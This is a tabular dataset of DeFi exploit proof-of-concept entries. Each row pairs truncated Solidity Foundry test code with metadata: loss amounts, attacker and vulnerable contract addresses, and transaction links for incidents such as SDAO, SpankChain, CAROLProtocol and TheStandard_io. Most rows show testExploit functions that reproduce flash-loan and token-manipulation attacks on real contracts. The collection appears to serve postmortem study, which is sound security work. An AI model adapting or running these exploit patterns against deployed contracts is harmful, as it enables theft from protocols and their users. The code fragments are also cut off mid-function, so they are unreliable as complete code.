// https://twitter.com/CertiKAlert/status/1597639717096460288
// @TX
// https://phalcon.blocksec.com/tx/bsc/0xdc53a6b5bf8e... | exploit_poc | MBC_ZZSH | 2022-11 | MBC_ZZSH_exp.sol | flash_loan | 6080b5b6c5787868 | 2026-01-07T10:59:16.535605 | postmortems | unknown | 23,474,460 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
USDT.approve(address(Router), type(uint256).max);
MBC.approve(address(Router), type(uint256).max);
ZZSH.approve(address(Router), type(uint256).max);
dodoFlahloanAmount = USDT.balanceOf(dodo);
DVM(dodo).flashLoan(0, dodoFlahloanAmount, address(this)... | true | Unknown | 4.96 | low | MBC_ZZSH Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~1.4K USD
// TX : https://app.blocksec.com/explorer/tx/optimism/0x9f34ae044cbbf3f1603769dcd90163add48348dde7e1dda41817991935ebfa2f
// Attacker : https://optimistic.ethe... | exploit_poc | Polynomial | 2022-11 | Polynomial_exp.sol | null | 8cd68d272e818dd3 | 2026-01-07T10:59:16.535656 | postmortems | ethereum | 39,343,642 | ~1.4K USD | 1,400 | https://optimistic.etherscan.io/address/0xcf8396010fb7e651f85a439dd7ebc0c8ab56b3f3 | https://optimistic.etherscan.io/address/0xf682e302f16c9509ffa133029ccf6de55f4e29a8 | null | null | null | null | true | false | false | low | ~1.4K USD | unknown | function testExploit() public {
attack();
} | true | https://optimistic.etherscan.io/address/0xcf8396010fb7e651f85a439dd7ebc0c8ab56b3f3 | https://optimistic.etherscan.io/address/0xf682e302f16c9509ffa133029ccf6de55f4e29a8 | $1.4K | 5.71 | medium | Polynomial Exploit (2022-11) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/AnciliaInc/status/1593690338526273536
// @TX
// https://bscscan.com/tx/0x3757d177482171dcfad7066c5e88d6f0f0fe74b28f32e41dd77137cad859c777
contract ContractTest... | exploit_poc | Annex | 2022-11 | Annex_exp.sol | flash_loan | 41dace566c4fb2fb | 2026-01-07T10:59:16.535702 | postmortems | bsc | 23,165,446 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
MyERC20 MyToken = new MyERC20();
Token = address(MyToken);
MyToken.mint(10 * 1e18);
DVM(dodo).flashLoan(8 * 1e18, 0, address(this), new bytes(1));
emit log_named_decimal_uint("[End] Attacker WBNB balance after exploit", WBNB.balanceOf(address(this... | true | Unknown | 5.27 | medium | Annex Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/8olidity/status/1594693686398316544
// https://twitter.com/CertiKAlert/status/1594615286556393478
// @TX
// https://bscscan.com/tx/0xb3ac111d294ea9dedfd99349304... | exploit_poc | SDAO | 2022-11 | SDAO_exp.sol | flash_loan | 8831835584fc9151 | 2026-01-07T10:59:16.535751 | postmortems | bsc | 23,241,440 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
USDT.approve(address(Router), type(uint256).max);
SDAO.approve(address(Router), type(uint256).max);
Pair.approve(address(Router), type(uint256).max);
Pair.approve(address(SDAO), type(uint256).max);
SDAO.approve(address(this), type(uint256).max);
... | true | Unknown | 5.03 | medium | SDAO Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BeosinAlert/status/1589501207181393920
// https://twitter.com/CertiKAlert/status/1589428153591615488
// TX
// https://bscscan.com/tx/0x03d363462519029cf9a544d440... | exploit_poc | MooCAKECTX | 2022-11 | MooCAKECTX_exp.sol | flash_loan | 967f9fbbd69d4b99 | 2026-01-07T10:59:16.535812 | postmortems | bsc | 22,832,427 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
address(WBNB).call{value: 3 ether}("");
WBNBToCTK();
CTK.transfer(address(SmartChef), CTK.balanceOf(address(this)));
DVM(dodo).flashLoan(0, 400_000 * 1e18, address(this), new bytes(1));
emit log_named_decimal_uint("[End] Attacker CAKE balance afte... | true | Unknown | 5 | medium | MooCAKECTX Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface Blacksmith {
function claimRewardsForPools(
address[] calldata _lpTokens
) external;
function claimRewards(
address _lpToken
) external;
function dep... | exploit_poc | Cover | 2020-12 | Cover_exp.sol | null | d7498517d839053f | 2026-01-07T10:59:16.535873 | postmortems | unknown | 11,542,309 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function test() public {
cheat.prank(0x00007569643bc1709561ec2E86F385Df3759e5DD);
bs.deposit(address(bpt), 15_255_552_810_089_260_015_361);
emit log_named_uint("Deposit BPT", 15_255_552_810_089_260_015_361);
cheat.prank(0x00007569643bc1709561ec2E86F385Df3759e5DD);
//bs.withdraw(a... | true | Unknown | 2.73 | low | Cover Exploit (2020-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : 155 $ETH
// Attacker : https://etherscan.io/address/0xcf267eA3f1ebae3C29feA0A3253F94F3122C2199
// Attack Contract : https://etherscan.io/address/0xc5918a927C4FB83FE99E30d6F66707F4b396900E
// Vulnerable... | exploit_poc | SpankChain | 2018-10 | SpankChain_exp.sol | flash_loan | e6e79f1d9dbbbc99 | 2026-01-07T10:59:16.535912 | postmortems | ethereum | null | 155 $ETH | 155 | https://etherscan.io/address/0xcf267eA3f1ebae3C29feA0A3253F94F3122C2199 | https://etherscan.io/address/0xc5918a927C4FB83FE99E30d6F66707F4b396900E | https://etherscan.io/address/0xf91546835f756DA0c10cFa0CDA95b15577b84aA7 | https://etherscan.io/tx/0x21e9d20b57f6ae60dac23466c8395d47f42dc24628e5a31f224567a2b4effa88 | null | null | true | true | true | low | 155 $ETH | flash-loan | function testExploit() public balanceLog {
//implement exploit code here
vm.deal(address(this), 5 ether); //simulation flashloan
SpankChainExploitHelper h = new SpankChainExploitHelper();
h.exploit{value: 5 ether}(32);
payable(address(0x0)).transfer(5 ether); //simulation replay ... | true | 155 $ETH | https://etherscan.io/address/0xcf267eA3f1ebae3C29feA0A3253F94F3122C2199 | https://etherscan.io/address/0xc5918a927C4FB83FE99E30d6F66707F4b396900E | https://etherscan.io/address/0xf91546835f756DA0c10cFa0CDA95b15577b84aA7 | https://etherscan.io/tx/0x21e9d20b57f6ae60dac23466c8395d47f42dc24628e5a31f224567a2b4effa88 | $155 | 8.63 | high | SpankChain Exploit (2018-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~17 ETH
// TX : https://app.blocksec.com/explorer/tx/eth/0xbf5b2d22fa88965ddfc6e6d685fc7cfc683340c49e126386759ed9e4027b1415
// Attacker : https://etherscan.io/address/... | exploit_poc | RBalancer | 2023-11 | RBalancer_exp.sol | null | 7869e9018e8c406b | 2026-01-07T10:59:16.535961 | postmortems | ethereum | 18,523,440 | ~17 ETH | 17 | https://etherscan.io/address/0x9abe851bcc4fd1986c3d1ef8978fad86a26a0c57 | https://etherscan.io/address/0x9c52c485edd3d22847a1614b8988fbf520b33047 | null | null | null | null | true | false | false | low | ~17 ETH | unknown | function testExpolit() public {
emit log_named_decimal_uint(
"attacker WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals()
);
emit log_named_decimal_uint("attacker balance before attack", address(this).balance, 18);
attack();
emit log_named_d... | true | https://etherscan.io/address/0x9abe851bcc4fd1986c3d1ef8978fad86a26a0c57 | https://etherscan.io/address/0x9c52c485edd3d22847a1614b8988fbf520b33047 | $17 | 4.97 | low | RBalancer Exploit (2023-11) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$53K
// Attacker : https://basescan.org/address/0x5aa27d556f898846b9bad32f0cdba5b1f8bc3144
// Attack Contract : https://basescan.org/address/0xc4566ae957ad8dde4768bdd28c... | exploit_poc | CAROLProtocol | 2023-11 | CAROLProtocol_exp.sol | flash_loan | 384951104f58aa96 | 2026-01-07T10:59:16.536007 | postmortems | base | null | ~$53K | 53,000 | https://basescan.org/address/0x5aa27d556f898846b9bad32f0cdba5b1f8bc3144 | https://basescan.org/address/0xc4566ae957ad8dde4768bdd28cdc3695e4780b2c | https://basescan.org/address/0x26fe408bbd7a490feb056da8e2d1e007938e5685 | https://app.blocksec.com/explorer/tx/base/0xd962d397a7f8b3aadce1622e705b9e33b430e86e0d306d6fb8ccbc5957b4185c | null | https://x.com/MetaSec_xyz/status/1730496513359647167 | true | true | true | medium | ~$53K | flash-loan | function testExploit() public {
// Prepare tx:
// Start with following ETH balance
deal(address(this), 0.07 ether);
emit log_named_decimal_uint("Exploiter ETH balance before attack", address(this).balance, 18);
// Buy CAROL tokens with ETH through bonding. Create active 'Bond'
... | true | ~$53K | https://basescan.org/address/0x5aa27d556f898846b9bad32f0cdba5b1f8bc3144 | https://basescan.org/address/0xc4566ae957ad8dde4768bdd28cdc3695e4780b2c | https://basescan.org/address/0x26fe408bbd7a490feb056da8e2d1e007938e5685 | https://app.blocksec.com/explorer/tx/base/0xd962d397a7f8b3aadce1622e705b9e33b430e86e0d306d6fb8ccbc5957b4185c | https://x.com/MetaSec_xyz/status/1730496513359647167 | $53.0K | 10 | high | CAROLProtocol Exploit (2023-11) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "./../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$4K
// Attacker : https://etherscan.io/address/0x0c06340f5024c114fe196fcb38e42d20ab00f6eb
// Attack Contract : https://etherscan.io/address/0x80a6419cb8e7d1ef1af074368f7... | exploit_poc | MetaLend | 2023-11 | MetaLend_exp.sol | flash_loan | 211290d39105b2fb | 2026-01-07T10:59:16.536078 | postmortems | ethereum | null | ~$4K | 4,000 | https://etherscan.io/address/0x0c06340f5024c114fe196fcb38e42d20ab00f6eb | https://etherscan.io/address/0x80a6419cb8e7d1ef1af074368f7eace1ae2358ca | https://etherscan.io/address/0x5578f2e245e932a599c46215a0ca88707230f17b | https://app.blocksec.com/explorer/tx/eth/0x4c684fb2618c29743531dec9253ede1b757bda0b323dc2f305e3b50ab1773da7 | null | https://x.com/MetaSec_xyz/status/1728424965257691173 | true | true | true | low | ~$4K | flash-loan | function testExploit() public {
deal(address(this), 0);
emit log_named_decimal_uint("Exploiter WETH balance before attack", WETH.balanceOf(address(this)), 18);
Spark.flashLoanSimple(address(this), address(WETH), 100e18, bytes(""), 0);
emit log_named_decimal_uint("Exploiter WETH balance... | true | ~$4K | https://etherscan.io/address/0x0c06340f5024c114fe196fcb38e42d20ab00f6eb | https://etherscan.io/address/0x80a6419cb8e7d1ef1af074368f7eace1ae2358ca | https://etherscan.io/address/0x5578f2e245e932a599c46215a0ca88707230f17b | https://app.blocksec.com/explorer/tx/eth/0x4c684fb2618c29743531dec9253ede1b757bda0b323dc2f305e3b50ab1773da7 | https://x.com/MetaSec_xyz/status/1728424965257691173 | $4.0K | 9.2 | high | MetaLend Exploit (2023-11) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import {Test, console2} from "forge-std/Test.sol";
import "../interface.sol";
// @Analysis
// https://lunaray.medium.com/okc-project-hack-analysis-0907312f519b
// @TX
// https://dashboard.tenderly.co/tx/bnb/0xd85c603f71bb84437bc69b21d785f982f763035557356... | exploit_poc | OKC | 2023-11 | OKC_exp.sol | flash_loan | ba210083ffb8b69d | 2026-01-07T10:59:16.536141 | postmortems | unknown | 33,464,598 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
// 0.000000000000000001
attack_contract.expect1{value: 1 ether}();
}
}
contract AttackContract is IDODOCallee {
uint256 public nonce = 1;
AttackContract2 public attack_contract1;
AttackContract2 public attack_contract2;
IERC20 public USDT = IERC20(0x... | true | Unknown | 6 | medium | OKC Exploit (2023-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~$61k
// Frontrunner: https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891
// Original Attacker: https://bscscan.com/address/0x84f37F6cC75cCde5fE9bA99... | exploit_poc | AIS | 2023-11 | AIS_exp.sol | null | 8cc219aa1319da20 | 2026-01-07T10:59:16.536241 | postmortems | bsc | 33,916,687 | ~$61k | 61,000 | https://bscscan.com/address/0x84f37F6cC75cCde5fE9bA99093824A11CfDc329D | https://bscscan.com/address/0xf6f60b0e83d9837c1f247c575c8583b1d085d351 | null | https://bscscan.com/tx/0x0be817b6a522a111e06293435c233dab6576d7437d0e148b45efcf7ab8a10de0 | null | null | true | true | false | medium | ~$61k | unknown | function testExploit() public {
uint256 balanceBefore = usdt.balanceOf(address(this));
usdt.approve(address(router), type(uint256).max);
AIS.approve(address(router), type(uint256).max);
pool.flash(address(this), 3_000_000 ether, 0, new bytes(1));
uint256 balanceAfter = usdt.bal... | true | https://bscscan.com/address/0x84f37F6cC75cCde5fE9bA99093824A11CfDc329D | https://bscscan.com/address/0xf6f60b0e83d9837c1f247c575c8583b1d085d351 | https://bscscan.com/tx/0x0be817b6a522a111e06293435c233dab6576d7437d0e148b45efcf7ab8a10de0 | $61.0K | 6.89 | medium | AIS Exploit (2023-11) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
// @KeyInfo - Total Lost : ~$30K
// Attacker : https://bscscan.com/address/0xdf6b0200b4e1bc4a310f33df95a9087cc2c79038
// Attack Contract : https://bscscan.com/address/0x721a66c7767103e7dcacf8440e8dd074edff40a8
// Vulnerable C... | exploit_poc | LinkDao | 2023-11 | LinkDao_exp.sol | null | 381d1d837329914e | 2026-01-07T10:59:16.536291 | postmortems | bsc | 33,527,744 | ~$30K | 30,000 | https://bscscan.com/address/0xdf6b0200b4e1bc4a310f33df95a9087cc2c79038 | https://bscscan.com/address/0x721a66c7767103e7dcacf8440e8dd074edff40a8 | https://bscscan.com/address/0x6524a5fd3fec179db3b3c1d21f700da7abe6b0de | https://explorer.phalcon.xyz/tx/bsc/0x4ed59e3013215c272536775a966f4365112997a6eec534d38325be014f2e15ee | null | https://x.com/phalcon_xyz/status/1725058908144746992 | true | true | false | medium | ~$30K | unknown | function test() public {
// vm.prank(0xdF6B0200B4e1Bc4a310F33DF95a9087cC2C79038, 0xdF6B0200B4e1Bc4a310F33DF95a9087cC2C79038);
x2effb772();
} | true | ~$30K | https://bscscan.com/address/0xdf6b0200b4e1bc4a310f33df95a9087cc2c79038 | https://bscscan.com/address/0x721a66c7767103e7dcacf8440e8dd074edff40a8 | https://bscscan.com/address/0x6524a5fd3fec179db3b3c1d21f700da7abe6b0de | https://explorer.phalcon.xyz/tx/bsc/0x4ed59e3013215c272536775a966f4365112997a6eec534d38325be014f2e15ee | https://x.com/phalcon_xyz/status/1725058908144746992 | $30.0K | 7.22 | medium | LinkDao Exploit (2023-11) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~5 $ETH
// Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
// Vulnerable Contract : https://bscscan.com/address/0x15b1ed79ca9d7955af3e169d7b323c4f1eeb5d12
// Attack Tx : https://bscscan.com/tx/0... | exploit_poc | KR | 2023-11 | KR_exp.sol | null | 6090386e059b5b21 | 2026-01-07T10:59:16.536334 | postmortems | bsc | 33,267,985 | ~5 $ETH | 5 | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | null | https://bscscan.com/address/0x15b1ed79ca9d7955af3e169d7b323c4f1eeb5d12 | https://bscscan.com/tx/0x2abf871eb91d03bc8145bf2a415e79132a103ae9f2b5bbf18b8342ea9207ccd7 | null | null | true | false | false | low | ~5 $ETH | unknown | function testExploit() public {
BUSD.transfer(address(0x000000000000000000000000000000000000dEaD), BUSD.balanceOf(address(this)));
emit log_named_uint("Attacker BUSD balance before attack", BUSD.balanceOf(address(this)));
tokenToSell = KR.balanceOf(address(0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2... | true | ~5 $ETH | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0x15b1ed79ca9d7955af3e169d7b323c4f1eeb5d12 | https://bscscan.com/tx/0x2abf871eb91d03bc8145bf2a415e79132a103ae9f2b5bbf18b8342ea9207ccd7 | $5 | 6.76 | medium | KR Exploit (2023-11) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "./../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$18K
// Attacker : https://bscscan.com/address/0xf5f21746ff9351f16a42fa272d7707cc35760e4b
// Attack Contract : https://bscscan.com/address/0x76c8a674e814f5bd806fe6dd9975... | exploit_poc | WECO | 2023-11 | WECO_exp.sol | null | 9c614ce82872500a | 2026-01-07T10:59:16.536379 | postmortems | bsc | null | ~$18K | 18,000 | https://bscscan.com/address/0xf5f21746ff9351f16a42fa272d7707cc35760e4b | https://bscscan.com/address/0x76c8a674e814f5bd806fe6dd9975446a76056c1a | https://bscscan.com/address/0xd672b766d66662f5c6fd798a999e1193a7945451 | https://app.blocksec.com/explorer/tx/BSC/0x2040a481c933b50ee31aba257c2041c48bb7a0b4bf4b4fad1ac165f19c4269e8 | null | https://x.com/MetaSec_xyz/status/1725311048625041887 | true | true | false | medium | ~$18K | unknown | function testExploit() public {
// Initial WECOIN balance. There was a transfer of WECOIN tokens from exploiter to attack contract
// https://app.blocksec.com/explorer/tx/bsc/0x6129e18fdba3b4d3f1e6c3c9c448cafcbee5b5c82e4bbb69a404360f0e579051
deal(address(WECOIN), address(this), 25_000_001 ether)... | true | ~$18K | https://bscscan.com/address/0xf5f21746ff9351f16a42fa272d7707cc35760e4b | https://bscscan.com/address/0x76c8a674e814f5bd806fe6dd9975446a76056c1a | https://bscscan.com/address/0xd672b766d66662f5c6fd798a999e1193a7945451 | https://app.blocksec.com/explorer/tx/BSC/0x2040a481c933b50ee31aba257c2041c48bb7a0b4bf4b4fad1ac165f19c4269e8 | https://x.com/MetaSec_xyz/status/1725311048625041887 | $18.0K | 7.44 | medium | WECO Exploit (2023-11) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "./../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : Unclear
// Attacker : https://bscscan.com/address/0xfe2105e1317dfd6ed3887bf7882977c03cfebb7c
// Attack Contract : https://bscscan.com/address/0x22ad9eef79615a1592e969bdf7... | exploit_poc | SwampFinance | 2023-11 | SwampFinance_exp.sol | flash_loan | 03eeed95fb3d5837 | 2026-01-07T10:59:16.536426 | postmortems | bsc | null | Unclear | null | https://bscscan.com/address/0xfe2105e1317dfd6ed3887bf7882977c03cfebb7c | https://bscscan.com/address/0x22ad9eef79615a1592e969bdf7b238a07281ab80 | https://bscscan.com/address/0x33adbf5f1ec364a4ea3a5ca8f310b597b8afdee3 | https://app.blocksec.com/explorer/tx/bsc/0x13e75878a21af9a9b2207f5d9e18f19a43083a9ffbac36df5a7d4d67a52c164f | null | https://x.com/MetaSec_xyz/status/1720373044517208261 | true | true | true | medium | Unclear | flash-loan | function testExploit() public {
deal(address(this), 0);
// In the begining transfer tokens from exploiter to attack contract
deal(address(WBNB), address(this), 1e15);
deal(address(BUSDT), address(this), 155_049_710_721_328_089);
deal(address(beltBNB), address(this), 1_272_113_372... | true | Unclear | https://bscscan.com/address/0xfe2105e1317dfd6ed3887bf7882977c03cfebb7c | https://bscscan.com/address/0x22ad9eef79615a1592e969bdf7b238a07281ab80 | https://bscscan.com/address/0x33adbf5f1ec364a4ea3a5ca8f310b597b8afdee3 | https://app.blocksec.com/explorer/tx/bsc/0x13e75878a21af9a9b2207f5d9e18f19a43083a9ffbac36df5a7d4d67a52c164f | https://x.com/MetaSec_xyz/status/1720373044517208261 | Unknown | 8.54 | high | SwampFinance Exploit (2023-11) | false | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
// @KeyInfo - Total Lost : ~$52K
// Attacker : https://bscscan.com/address/0xe9fac789c947f364f53c3bc28bb6e9e099526468
// Attack Contract : https://bscscan.com/address/0x87c75f8a69732bad999ce1fab464526856215c77
// Vulnerable C... | exploit_poc | Token8633_9419 | 2023-11 | Token8633_9419_exp.sol | null | 80f5ac265abc1a29 | 2026-01-07T10:59:16.536490 | postmortems | bsc | 33,545,074 | ~$52K | 52,000 | https://bscscan.com/address/0xe9fac789c947f364f53c3bc28bb6e9e099526468 | https://bscscan.com/address/0x87c75f8a69732bad999ce1fab464526856215c77 | https://bscscan.com/address/0x11cd2168fc420ae1375626655ab8f355f0075bd6 | https://explorer.phalcon.xyz/tx/bsc/0xf6ec3c22b718c3da17746416992bac7b65a4ef42ccf5b43cf0716c82bffc2844 | null | null | true | false | false | medium | ~$52K | unknown | function test() public {
// vm.prank(0xe9FAc789C947f364f53C3BC28bB6E9e099526468, 0xe9FAc789C947f364f53C3BC28bB6E9e099526468);
xd8ea4b59();
} | true | ~$52K | https://bscscan.com/address/0xe9fac789c947f364f53c3bc28bb6e9e099526468 | https://bscscan.com/address/0x87c75f8a69732bad999ce1fab464526856215c77 | https://bscscan.com/address/0x11cd2168fc420ae1375626655ab8f355f0075bd6 | https://explorer.phalcon.xyz/tx/bsc/0xf6ec3c22b718c3da17746416992bac7b65a4ef42ccf5b43cf0716c82bffc2844 | $52.0K | 8.83 | high | Token8633_9419 Exploit (2023-11) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : ~$22.8K
// Attacker : https://bscscan.com/address/0xb06d402705ad5156b42e4279903cbd7771cf59c9
// Attack Contract : https://bscscan.com/address/0x9a16b5375e79e409a8bfdb17cfe568e533c2d7c5
// Vulnerable Co... | exploit_poc | EEE | 2023-11 | EEE_exp.sol | null | 054c2f46a690ac92 | 2026-01-07T10:59:16.536550 | postmortems | bsc | 33,940,984 | ~$22.8K | 22,800 | https://bscscan.com/address/0xb06d402705ad5156b42e4279903cbd7771cf59c9 | https://bscscan.com/address/0x9a16b5375e79e409a8bfdb17cfe568e533c2d7c5 | https://bscscan.com/address/0x0506e571aba3dd4c9d71bed479a4e6d40d95c833 | https://bscscan.com/tx/0x7312d9f9c13fc69f00f58e92a112a3e7f036ced7e65f7e0fa67382488d5557dc | null | null | true | true | false | medium | ~$22.8K | unknown | false | ~$22.8K | https://bscscan.com/address/0xb06d402705ad5156b42e4279903cbd7771cf59c9 | https://bscscan.com/address/0x9a16b5375e79e409a8bfdb17cfe568e533c2d7c5 | https://bscscan.com/address/0x0506e571aba3dd4c9d71bed479a4e6d40d95c833 | https://bscscan.com/tx/0x7312d9f9c13fc69f00f58e92a112a3e7f036ced7e65f7e0fa67382488d5557dc | $22.8K | 5.78 | medium | EEE Exploit (2023-11) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "./../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$3K
// Attacker : https://etherscan.io/address/0x9d44f1a37044500064111010632a8a59003701c8
// Attack Contract : https://etherscan.io/address/0x4bc691601b50b3e107b89d5ea17... | exploit_poc | Burntbubba | 2023-11 | Burntbubba_exp.sol | flash_loan | 7544910fd97b8cd7 | 2026-01-07T10:59:16.536601 | postmortems | ethereum | null | ~$3K | 3,000 | https://etherscan.io/address/0x9d44f1a37044500064111010632a8a59003701c8 | https://etherscan.io/address/0x4bc691601b50b3e107b89d5ea172b40a9dbc6251 | https://etherscan.io/address/0xa44e79a2c9a8965e7a6fa77bf0ca8faf50e6c73e | https://app.blocksec.com/explorer/tx/eth/0x2b6d0af0dc513a15e325703405739057f9de6ef3f99934b957653b8a3fade4c6 | null | https://x.com/MetaSec_xyz/status/1730044259087315046 | true | true | true | low | ~$3K | flash-loan | function testExploit() public {
// Attacking contract start AST amount
deal(address(AST), address(this), 2_062_557);
emit log_named_decimal_uint("Exploiter USDC balance before attack", USDC.balanceOf(address(this)), 6);
emit log_named_decimal_uint("Exploiter WETH balance before attack", ... | true | ~$3K | https://etherscan.io/address/0x9d44f1a37044500064111010632a8a59003701c8 | https://etherscan.io/address/0x4bc691601b50b3e107b89d5ea172b40a9dbc6251 | https://etherscan.io/address/0xa44e79a2c9a8965e7a6fa77bf0ca8faf50e6c73e | https://app.blocksec.com/explorer/tx/eth/0x2b6d0af0dc513a15e325703405739057f9de6ef3f99934b957653b8a3fade4c6 | https://x.com/MetaSec_xyz/status/1730044259087315046 | $3.0K | 10 | high | Burntbubba Exploit (2023-11) | true | true | true | false | |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~23 WBNB
// TX : https://app.blocksec.com/explorer/tx/bsc/0x19ef4febcd272643642925d5d7e9ab8fd3ed8785c5e3268f5b6fee44ae6b4a34
// Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc5... | exploit_poc | BRAND | 2023-11 | BRAND_exp.sol | flash_loan | 42c4e9a946953062 | 2026-01-07T10:59:16.536660 | postmortems | bsc | 33,139,124 | ~23 WBNB | 23 | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0xf994f331409327425098feecfc15db7fabf782b7 | null | null | null | null | true | false | true | low | ~23 WBNB | flash-loan | false | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0xf994f331409327425098feecfc15db7fabf782b7 | $23 | 4.17 | low | BRAND Exploit (2023-11) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$150K
// Attacker : https://etherscan.io/address/0x4e087743e8025012c4704a1953c87eeff1e6ef48
// Attack Contract : https://etherscan.io/address/0x3763b7f83358171b1660ee20... | exploit_poc | MEV_0xa247 | 2023-11 | MEV_0xa247_exp.sol | null | 475340b8b438b86d | 2026-01-07T10:59:16.536723 | postmortems | ethereum | 18,552,866 | ~$150K | 150,000 | https://etherscan.io/address/0x4e087743e8025012c4704a1953c87eeff1e6ef48 | https://etherscan.io/address/0x3763b7f83358171b1660ee209f327954cc463129 | null | https://explorer.phalcon.xyz/tx/eth/0x53eeab4447db331dbb47f93fd58a95d6faa230d559acde0687f8b5f5829e7a45 | null | null | true | true | false | high | ~$150K | unknown | function testExploit() public {
deal(address(this), 0 ether);
approveAll();
address[] memory tokens = new address[](24);
tokens[0] = address(RAIL);
tokens[1] = address(BBANK);
tokens[2] = address(USDT);
tokens[3] = address(BUMP);
tokens[4] = address(0);
... | true | ~$150K | https://etherscan.io/address/0x4e087743e8025012c4704a1953c87eeff1e6ef48 | https://etherscan.io/address/0x3763b7f83358171b1660ee209f327954cc463129 | https://explorer.phalcon.xyz/tx/eth/0x53eeab4447db331dbb47f93fd58a95d6faa230d559acde0687f8b5f5829e7a45 | $150.0K | 8 | high | MEV_0xa247 Exploit (2023-11) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$290K
// Attacker : https://arbiscan.io/address/0x09ed480feaf4cbc363481717e04e2c394ab326b4
// Attack Contract : https://arbiscan.io/address/0xb589d4a36ef8766d44c9785131... | exploit_poc | TheStandard_io | 2023-11 | TheStandard_io_exp.sol | null | 06a9d870ae36a45a | 2026-01-07T10:59:16.536808 | postmortems | arbitrum | 147,817,765 | ~$290K | 290,000 | https://arbiscan.io/address/0x09ed480feaf4cbc363481717e04e2c394ab326b4 | https://arbiscan.io/address/0xb589d4a36ef8766d44c9785131413a049d51dbc0 | null | https://explorer.phalcon.xyz/tx/arbitrum/0x51293c1155a1d33d8fc9389721362044c3a67e0ac732b3a6ec7661d47b03df9f | null | null | true | true | false | high | ~$290K | unknown | function testExploit() public {
// Attacker sent PAXG amount to exploit contract before attack
deal(address(PAXG), address(this), 100e9);
emit log_named_decimal_uint("Attacker USDC balance before exploit", USDC.balanceOf(address(this)), 6);
emit log_named_decimal_uint("Attacker EURO ba... | true | ~$290K | https://arbiscan.io/address/0x09ed480feaf4cbc363481717e04e2c394ab326b4 | https://arbiscan.io/address/0xb589d4a36ef8766d44c9785131413a049d51dbc0 | https://explorer.phalcon.xyz/tx/arbitrum/0x51293c1155a1d33d8fc9389721362044c3a67e0ac732b3a6ec7661d47b03df9f | $290.0K | 8 | high | TheStandard_io Exploit (2023-11) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
